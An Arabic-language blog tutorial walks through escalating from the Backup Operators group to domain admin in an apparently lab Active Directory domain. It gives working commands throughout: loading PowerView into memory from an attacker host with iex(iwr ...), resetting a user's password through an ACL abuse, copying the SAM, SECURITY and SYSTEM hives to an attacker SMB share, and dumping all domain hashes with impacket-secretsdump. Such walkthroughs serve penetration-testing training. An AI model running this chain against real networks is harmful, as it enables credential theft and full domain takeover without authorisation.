Backup Operators Group To Domain Admin
السلام عليكم ورحمة الله وبركاته
الحمد لله على جميع نِعمه علينا ما علمنا منها وما لم نعلم حمداً والصلاة والسلام على نبينا محمد اشرف الخلق والمرسلين, اما بعد:
مقدمة:
ماهو قروب الـBackup Operator ؟
طبعا في البداية هذا القروب يتم انشاءة تلقائيا عند تنصيب بيئة الـActive Directory ويحتوي على ميزات تفيد المخترق في الوصول الى الـDomain Controller
الميزات اللي يحتويها هذا القروب هو انه يسمح له انه يسوي Backup الى اي ملف بغض النظر عن صلاحية الملف سواء كان قابل للقراءة او لا ف نحن تهمنا ثلاث ملفات واللي هي SAM ,SECURITY,SYSTEM
طبعا في هذي المقالة راح نتبع سيناريو معين ماراح فقط انفذ لكم التكنيك وننهي المقالة
الشرح:
اولا انا ماخذ جلسة Reverse Shell على المستخدم jehad
الان خلونا نشوف ايش الـACLS او الامكانيات اللي المستخدم jehad يقوم فيها
طبعا كل شي راح نسوي Load لي اداة powerview في الميموري عن طريق هذا الامر:
iex(iwr http://192.168.100.112/powerview.ps1 -usebasicparsing)
الان راح ننفذ هذا الامر عشان نشوف من هم المستخدمين المتواجدين في قروب الـ Backup Operators
Get-DomainGroupMember -identity "Backup Operators"
نلاحظ مع بعض ان المستخدم muhammed موجود ضمن قروب Backup Operator
الان خلونا نحاول نشوف هل المستخدم jehad عنده صلاحية على المستخدم muhammed مثلا انه يمكنه تغيير الباسورد او غيره
راح ننفذ هذا الامر عشان نشوف الصلاحيات المكتسبة لكل مستخدم:
Find-InterestingDomainAcl
نلاحظ مع بعض في الصورة السابقة انه المستخدم jehad عنده صلاحيات Extended Right على المستخدم muhammed ف هذا يعني انه ممكن نقوم بتغيير الباسورد الخاص في المستخدم muhammed
لو انت مو فاهم الـACLS زين عليك بالمقالة هذي Abusing Active Directory ACLs/ACEs
الان راح ننفذ هذا الامر عشان نغير الباسورد الخاص في المستخدم muhammed :
$SecureString = ConvertTo-SecureString -String "Tester12345#!!" -AsPlainText -Force
Set-DomainUserPassword -identity muhammed -AccountPassword $SecureString -domain vulnerable.com
الان بعد تغيير الباسورد الخاص في المستخدم muhammed اللي هو ضمن قروب الـBackup Operators راح نستخدم هذا السكربت BackupOperatorToDA
قبل استخدام الاداة افتح لك smb server عشان راح ننقل عليه ملفات الـSAM و الـSECURITY و الـSYSTEM
امر فتح smb server:
python /usr/share/doc/python3-impacket/examples/smbserver.py jehad . -smb2support
متطلبات الاداة موضحة في الصورة السابقة
t- اسم جهاز الـDomain Controller
o- الباث الخاص في الـsmb server اللي تم تشغيله مسبقا
u- اسم المستخدم اللي متواجد في قروب الـBackup Operators واللي هو muhammed
p- الباسورد الخاص في المستخدم muhammed
d- اسم النطاق واللي هو vulnerable.com
ف الامر النهائي راح يكون كذا:
.\BackUp.exe -t \\dc.vulnerable.com -o \\192.168.100.112\jehad\ -u muhammed -p Tester12345#!! -d vulnerable.com
الان تم نقل الثلاث الملفات المهمة واللي راح تفيدنا في استخراج NTLMv1 الخاص في الـDomain Controller
طبعا عشان نستخرجها الان راح نستخدم اداة secretdump عن طريق هذا الامر:
/usr/bin/impacket-secretsdump LOCAL -sam SAM -system SYSTEM -security SECURITY
الان تم استخراج NTLM هاش الخاص بالـDomain Controller
الان راح نعطي NT هاش لي اداة secretsdump مع اسم الـDomain Controller عشان تستخرج لنا جميع المستخدمين المتواجدين في بيئة الـActive Directory مع الهاش الخاص فيهم عن طريق ملف NTds
الامر:
/usr/bin/impacket-secretsdump VULNERABLE.COM/'dc$'@dc.vulnerable.com -hashes ':1836d9e3263fb4973cff3bed243849be'
وصلنا لنهاية المقالة
شاكر لكم .
التعليقات (0)
لايوجد لديك حساب في عالم البرمجة؟
تحب تنضم لعالم البرمجة؟ وتنشئ عالمك الخاص، تنشر المقالات، الدورات، تشارك المبرمجين وتساعد الآخرين، اشترك الآن بخطوات يسيرة !